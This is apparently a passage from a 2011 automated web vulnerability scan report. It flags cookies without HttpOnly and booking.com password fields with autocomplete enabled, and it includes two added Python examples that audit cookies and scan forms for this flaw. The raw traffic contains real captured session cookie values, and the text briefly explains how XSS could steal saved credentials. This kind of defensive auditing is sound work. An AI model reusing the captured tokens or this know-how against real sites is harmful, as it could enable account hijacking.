Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; synclock=t; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:03:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

14.296. http://www9.effectivemeasure.net/v4/em_js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: hl, vt and v (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5nb2FsLmNvbS9lbi90ZWFtcy9lbmdsYW5kLzk3L21hbi11dGQtbmV3cw%3D%3D&r=&f=1&ns=_em&rnd=0.11160158668644726&u=&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 01-Nov-2011 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d; expires=Wed, 26-Sep-2012 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d338_5280; expires=Mon, 03-Oct-2011 00:22:45 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 186
Date: Sun, 02 Oct 2011 23:52:45 GMT
Server: C20

_em._domain="goal.com";_em.setCkHl();_em.setCkVt("92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d");_em.setCkV("452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d");
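The check behind the instances above, as an added example that is not part of the original report or of Burp's own code: a small Python audit of Set-Cookie header values that records each cookie's attributes, flags the absence of HttpOnly and Secure, and applies a rough heuristic for values that look like opaque identifiers and therefore deserve the manual review the issue detail asks for. The three sample headers are copied from responses in this report (the sabretravelnetwork.com exp_tracker cookie, the wtp101.com tuuid cookie, and the booking.com bkng cookie, whose value is shortened here and which does carry HttpOnly). The SameSite check and the "opaque identifier" heuristic are this example's own assumptions; SameSite postdates the 2011 report.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote


@dataclass
class CookieReport:
    name: str
    value: str
    attrs: dict = field(default_factory=dict)    # lower-cased attribute -> value, or True for flags
    findings: list = field(default_factory=list)


def parse_set_cookie(header):
    """Split one Set-Cookie header value into name, value and its attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_value, val = part.partition("=")
        # Attribute names are case-insensitive: "HTTPOnly" and "HttpOnly" both count.
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return CookieReport(name.strip(), value, attrs)


def looks_opaque(value):
    """Heuristic (this example's assumption, not Burp's): a long string of hex, base64
    or UUID characters is an opaque identifier worth reviewing as a possible session
    token; timestamps, short flags and URL-encoded serialised PHP arrays are not."""
    v = unquote(value)
    if len(v) < 16 or v.isdigit():
        return False
    return re.fullmatch(r"[A-Za-z0-9+/=_\-.]+", v) is not None and len(set(v)) >= 10


def audit_set_cookie(header, over_https):
    """Return a CookieReport listing the protective attributes the cookie lacks."""
    c = parse_set_cookie(header)
    if "httponly" not in c.attrs:
        c.findings.append("missing HttpOnly")
    if over_https and "secure" not in c.attrs:
        c.findings.append("missing Secure")
    if "samesite" not in c.attrs:    # not a 2011 expectation, but a current one
        c.findings.append("missing SameSite")
    if looks_opaque(c.value):
        c.findings.append("opaque identifier: review whether it is a session token")
    return c


# Headers copied from the responses in this report; the bkng value is shortened here.
# The second element records whether the response was served over HTTPS.
SAMPLE_HEADERS = [
    ("exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/", False),
    ("tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com", False),
    ("bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly", False),
]


def audit_all(samples=SAMPLE_HEADERS):
    """Audit every sample header and return the reports in order."""
    return [audit_set_cookie(header, https) for header, https in samples]


if __name__ == "__main__":
    for report in audit_all():
        print(f"{report.name}: {', '.join(report.findings) or 'ok'}")
```

Run against the samples, exp_tracker is reported only for the missing flags (its value decodes to a serialised PHP array of visited paths, so it is not treated as a token), tuuid is reported for the missing flags and as an opaque identifier to review, and bkng passes the HttpOnly check but would be reported for Secure when audited as an HTTPS response.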

15. Password field with autocomplete enabled
There are 20 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This behaviour can be configured by the user and also by the applications that use the credentials. If it is enabled, credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks; a cross-site scripting flaw on the target site, for example, lets an attacker inject a login form that the browser then fills in with the saved credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" on the FORM tag (to cover all form fields) or on the relevant INPUT tags (to cover specific individual fields). Caveat: this advice reflects the browsers of the report's date (2011). Current versions of Chrome, Firefox, Safari and Edge deliberately ignore autocomplete="off" on login and password fields and still offer to save the credentials, so the attribute should be treated as defence in depth for legacy clients rather than as a control in its own right.
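The check that produces the instances listed in this section, as an added example that is not part of the original report or of Burp's own code: a Python scanner built on the standard-library HTML parser that reports every password input where neither the input itself nor its enclosing form carries autocomplete="off". The sample document is constructed for this example from the booking.com login form shown in 15.1 (form action and field attributes copied, the rest of the page omitted), alongside two hardened variants of the same form.

```python
from html.parser import HTMLParser


class PasswordAutocompleteScanner(HTMLParser):
    """Collect <input type="password"> fields that neither they nor their enclosing
    <form> mark with autocomplete="off" (the condition this report flags)."""

    def __init__(self):
        super().__init__()
        self.form_stack = []   # (action, form has autocomplete="off") for open forms
        self.findings = []     # one dict per unprotected password field

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            form_off = a.get("autocomplete", "").lower() == "off"
            self.form_stack.append((a.get("action", ""), form_off))
        elif tag == "input" and a.get("type", "text").lower() == "password":
            action, form_off = self.form_stack[-1] if self.form_stack else ("", False)
            field_off = a.get("autocomplete", "").lower() == "off"
            if not (form_off or field_off):
                self.findings.append({
                    "form_action": action,
                    "name": a.get("name", ""),
                    "id": a.get("id", ""),
                })

    def handle_endtag(self, tag):
        if tag == "form" and self.form_stack:
            self.form_stack.pop()


def find_unprotected_password_fields(html):
    """Return the password fields in html that a browser honouring autocomplete would store."""
    scanner = PasswordAutocompleteScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the booking.com login form from 15.1 (action and field attributes
# copied, everything else omitted) and two hardened variants of it.
VULNERABLE_FORM = """
<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<input type="text" name="username">
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
</form>"""

FIELD_HARDENED_FORM = VULNERABLE_FORM.replace('name="password"', 'name="password" autocomplete="off"')
FORM_HARDENED_FORM = VULNERABLE_FORM.replace('method="POST"', 'method="POST" autocomplete="off"')


if __name__ == "__main__":
    cases = [
        ("original form", VULNERABLE_FORM),
        ("autocomplete=off on the input", FIELD_HARDENED_FORM),
        ("autocomplete=off on the form", FORM_HARDENED_FORM),
    ]
    for label, document in cases:
        print(f"{label}: {find_unprotected_password_fields(document)}")
```

The parser tracks open forms on a stack so a password field is judged against the form it actually sits in, and it treats the attribute's value case-insensitively, matching how browsers read it. The original form yields one finding (the password field posting to secure.booking.com); both hardened variants yield none.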


15.1. http://www.booking.com/general.en-us.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /general.en-us.html

Issue detail

The page contains a form with the following action URL: https://secure.booking.com/login.html?tmpl=profile/slogin&protocol=http (see the form tag in the response below). The form contains the following password field with autocomplete enabled: password.

Request

GET /general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/about HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.6.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=5.31764388084412

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:31:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG%2FpVqxxgeiiGa2Aij6eAdFCIoFktHJRCU7t6pG8eYurfp1mo97MaE6Xt3SQiUpot4wcm%2Ful3h2cCp3Aq3v9fFndje7J5kBuXpqwKFwzq1d8NFsqOMXkMLOh8MheA4SvhsDED1JW8Lzq1pPPuNWkLtLa2nYu4GrPir7OHtXIl44wyZZqW%2BoUI25Qt%2Bq%2FThnN11dNMvpllwZf%2BFUGaF0yEYQWfEUxqgLGBTcGCbPL2PoJSvzs3aJcz6peq6OJcz0X3v8XJzxlrl3Re%2B4fMPNVGOKw3OXRjD9BApu3kdB%2B4DfNedCdH7nvJIk8bHMsdAXvWaipTAaEEr77iSzcDzu0k4Pb0VGYDgJMguGhKAboI9qdT5%2FfoxQD1ZO10v0YKUwppRIyD0a3Ln9PUrxwZkhSSkHFlrAVjent8lv1qDG2xdp9lmPdV5vh3rRmuN1Lz0QN%2F3V2Sn9fPeJsHrK0pcgOYpSyW0n95GoFoyAkBhI17Phwo7yrvrjeDNHmxKMRkraR5MdqFJBuwCVd9dBvXoVyxW413W13jwOQsaHZx8iPdphluzMD5h3jwOEjlDkBpFkAF0kJZnoHDtUP3l1iRU%2FdEKfImnJ%2FQISsSKIW2wR5lSf%2F1SximqCADYBfEBvNs%2Bb4p%2BXQ0a42SQI1HuZMn7XZ3eadU1vaR0aacQEhT%2BTMbKt5QCA48TalbFf5k5egYBg9r%2B4N8uoiUgQQYx%2Ftt5AO9%2FVBRh7aJptr3L4saF02KTAh9Z0p5%2Fihhjlsn4hE28vhAsssqhO3O8S8giS%2BAD9yLu1raMti3QMcj0gfOfbUXo26HhPHD3cS56Ly4PlQzJm6UrwqCaLpO7KTYRTBFNfjq%2FicOkR6pMNZ1%2FC%2Fc0eZGJAjprFnEfcz%2Ff1D2udPGhpbVYLpVeRCyKbNt53ggYIGQr1TTkJ7xhSCCOCzTUXuE6dUGpUiWBZ7%2F3AHIMw6FvtaQBTat%2FQXE6ame41kAL%2B6V00yN0Xmopzv5yDpjigEcOO5oIMkGwsHdniwwtzhwSITaOyh2%2FKP0tbPU%2FCeKxA16ayEzJ5YKOenV4WVCjaYstXg3Le9A%2B%2BgxuR7X2ojY6dDXatodt%2F5RDf3maagBIdR6Oc6ZIKCZVYQTZjElDDZ8cp%2FgiTlLo6jDqUUyssnkr6X3M%2FAjD%2BrZNH8IuQKQM72Zu1cjPHJxdgPqO%2BOs%2F7rRh9o%2FTf5CKOGhXuc0PdC22WNwtICZpDHs8KyH%2F%2FopDWQBPuGzYzztul5MGNxkOl4zCU0jr3252eba8xA1Mw3aePG1Sf%2F8UQEgao7bg13Co2dpibytVWXIz1SXqF3vHV2vONIMhbOr0HejT8ddOxSgNDag0VIm1OAYgAbMxdRRA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59658
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...

15.2. http://www.booking.com/hotel/us/c-boston-massachusettes.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74mwWA2qRP9ibjLlGSkGnixIN53jQSEFpZ%2Btt%2FEJbWxCwnNo9PFCYgujcC5zr%2FNnG2SXj%2FlwkxJh0Rlt6OoCAfAXC3G1Glp4pwRM49T3YD64Tefl5B%2BA6FojZRWNPqfRuwCMgCSmHsFJeZKeepvzYPcawzb3ElmfM8U3kB%2B0xUq4ewe4gLbFQ0okcCs2oila3oQmChJIOFelhvhIn3j4XqTiKyB%2BzNUZJLBDJC9FMQQsn%2F99mmnY3TlC%2FB6EQg2nU50Pd4t5idoU7FR6PL8ulD098rM8qIHr2I0DBfTZZ1JTx2qAEhooN7rqEfROrFcBxEYba%2FtDUB7St7FdNyKXMz4h1eh9eWzHmGeQIFzoBcbrv7%2FOlyH18uHrrwywNNBs%2B6CPYsZxHSrLNYNkA3p54cJwVJJtADgBE9vkTKuoaRbmXXXYcQ86rDIbGJUCDA2j0x8fpuMDPY2mQ%2BCdx%2FNusXDhxf%2BA0ZMhno3cUHHRqbWpereTJlY2vVu5h1Y2q7Cfi6ApwJWDv%2BfuO98fIM%2Fhu%2FX%2B0SLvl%2B%2Fjx1LGZc1US2Gz1ZieDavXXvciTa6rXmIm2%2FdKvW7s4q2AwZtOX30qxBGshCyJgjKtgjiMCxDyxFVdf7EcVq4JTOguZfxVqHRR%2B%2Fcy%2BSAsTRg9zqx%2FtST2kRIticJJiOXs6ArJfMau9s79Jc%2FA8jvUPg%2F2bBTHy7Yjm1PE3illu56a6dgj0n1%2Fyb0UCfVwE5jRsU%2BKkT7s7cUmVhAVhZ9usxmGKlwYdTA2rY%2FaI9lxsClMjpiDXHCWmXJc2FaVspfJMjtvDmIanyPF9zgnyRRAeWeq73NdAIQVD9Zkcn0w3u78GbuMZtBlzzxK9usz%2BTZzzq0pw5svZbpRvL0MkGkwvD7cMgq0i%2F6a1NX3K1Ch4yWCS%2BHLRvlcSHdTUywk0u%2B0xmqD2%2Bxg8uxhsE1%2FdvBw93mjrIZu5AP3L4MmqoA9edCGGVPgqIJBf01YcyckRX0%2F0cTNB3u%2Bl5Ype%2FywAfb%2Fa8awDp9BWNKgj%2B6EqGsglDnmUWQN3JweXVWhgzBOpzywYIa2d4nWm0alm9aDppC34Dcx8P7tuThuOduYpc1bkAp%2FVnuVGE9T8ESzu%2B9adrUWruCp%2BLpAUvAIiGYGNFTgEAiQCQ8xz2aIjBa1urHpuk2GZtYTUi4j5ROFYT4DXZ1IAVCPuvuTFnqiS2HnjKi4xJXmNmkg8rBg9xWoDZ%2BH0wwqRX4iZWOY3i5iNEwebqtaoie%2BP7r6G%2FLQUM7pXZ4w0OMpQMyQi%2FVFaQETCe9980e9NIYR8OQkNVLofepzbE1hCbxXn6Q0kJJKpE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:02:15 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232378
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...

15.3. http://www.booking.com/hotel/us/copley-square.en-us.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
